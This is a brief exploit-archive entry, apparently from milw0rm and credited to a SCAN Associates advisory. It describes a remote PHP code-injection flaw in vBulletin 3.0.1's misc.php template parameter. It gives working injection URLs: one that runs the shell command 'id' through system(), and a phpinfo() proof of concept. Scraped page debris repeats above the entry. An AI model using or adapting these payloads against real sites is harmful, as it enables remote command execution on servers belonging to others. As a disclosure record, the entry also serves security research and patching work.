12 lines
No EOL
300 B
Text
12 lines
No EOL
300 B
Text
# Tested on vBulletin Version 3.0.1 /str0ke
|
|
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
|
|
#
|
|
|
|
# [SCAN Associates Security Advisory]
|
|
# http://www.scan-associates.net
|
|
|
|
Proof of concept
|
|
================
|
|
http://site.com/misc.php?do=page&template={${phpinfo()}}
|
|
|
|
# milw0rm.com [2005-02-22] |